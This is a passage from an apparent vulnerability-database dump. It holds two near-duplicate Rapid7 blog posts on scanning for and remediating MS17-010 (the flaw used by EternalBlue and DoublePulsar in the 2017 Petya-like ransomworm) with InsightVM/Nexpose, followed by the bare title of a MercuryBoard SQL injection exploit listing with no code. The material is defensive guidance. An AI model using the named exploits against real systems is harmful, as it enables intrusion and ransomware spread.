target=\"_blank\">CVE-2017-0145</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0146</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0147</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a>5. Save the template and run a scan to identify all assets with MS17-010. <h2 dir=\"ltr\">Creating a Dynamic Asset Group</h2>Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\">InsightVM</a> console, just under the search button: <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a>Now, use the \"CVE ID\" filter to specify the CVEs listed below:<a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a>This asset group can now be used for reporting as well as tagging to quickly identify exposed systems. <h2 dir=\"ltr\">Creating a Dashboard</h2>Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities. Also, check out the new <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\">Threat Feed dashboard</a> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm. If you want to build your own, here’s <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\">how you can build a custom dashboard</a>, with examples taken from the Shadow Brokers leak.  To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter: asset.vulnerability.alternateIds <=> ( altId = \"MS17-010\" )  <h2 dir=\"ltr\">Creating a SQL Query Export</h2>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting.</a> <h2 dir=\"ltr\">Creating a Remediation Project</h2>In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the “Projects” tab and click “Create a Project”: <a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a> Give the project a name, and under vulnerability filter type in vulnerability.alternateIds.altId CONTAINS \"MS17-010\" <a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a> Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\">JIRA or ServiceNow</a>, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks. Using these steps, you’ll be able to quickly scan for some of the vulnerabilities leveraged by this ransomworm. If you have any questions please don’t hesitate to let us know! For more information and resources on this ransomworm, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\">please visit this page</a>.</div>", "modified": "2017-08-03T16:56:04", "published": "2017-08-03T16:56:04", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "type": "rapid7community", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-28T03:17:01", "bulletinFamily": "blog", "description": "<div class=\"jive-rendered-content\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several european countries and the US. It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and then leverages the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue </a>and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\">DoublePulsar </a>exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, ExternalBlue was leveraged for <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">WannaCry</a> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities.  For the latest updates on this ransomworm, please see Rapid7’s <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\">recommended actions</a>. To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">download a trial of InsightVM here</a>. <h2 dir=\"ltr\">Creating a Scan Template</h2>The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 is as follows:1.  Under the Administration tab, go to Templates > Manage Templates <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67229/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67229/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a>  2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description. <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67230/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67230/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> 3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\" <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67231/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67231/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> 4. Add Check “<a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\">MS17-010</a>” and click Save: <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67232/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67232/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> This should return checks that are related to MS17-010. The related CVEs are:<a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0143</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0144</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0145</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0146</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0147</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a>5. Save the template and run a scan to identify all assets with MS17-010. <h2 dir=\"ltr\">Creating a Dynamic Asset Group</h2>Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\">InsightVM</a> console, just under the search button: <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a>Now, use the \"CVE ID\" filter to specify the CVEs listed below: <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a>This asset group can now be used for reporting as well as tagging to quickly identify exposed systems. <h2 dir=\"ltr\">Creating a Dashboard</h2>Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.  Also, check out the new <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\">Threat Feed dashboard</a> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm. If you want to build your own, here’s <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\">how you can build a custom dashboard</a>, with examples taken from the Shadow Brokers leak.  To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter: asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\" <h2 dir=\"ltr\">Creating a SQL Query Export</h2>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting.</a> <h2 dir=\"ltr\">Creating a Remediation Project</h2>In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the “Projects” tab and click “Create a Project”: <a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a> Give the project a name, and under vulnerability filter type in vulnerability.alternateIds.altId CONTAINS \"MS17-010\" <a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a> Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\">JIRA or ServiceNow</a>, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks. Using these steps, you’ll be able to quickly scan for the vulnerabilities leveraged by this ransomworm. If you have any questions please don’t hesitate to let us know! For more information and resources on this ransomworm, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\">please visit this page</a>.</div>", "modified": "2017-06-28T00:06:12", "published": "2017-06-28T00:06:12", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/protecting-against-petya-like-ransom-worm-with-insightvm-and-nexpose", "id": "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "type": "rapid7community", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

MercuryBoard &lt;= 1.1.4 (User-Agent) Remote SQL Injection Exploit

Description

Exploit for unknown platform in category web applications

MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit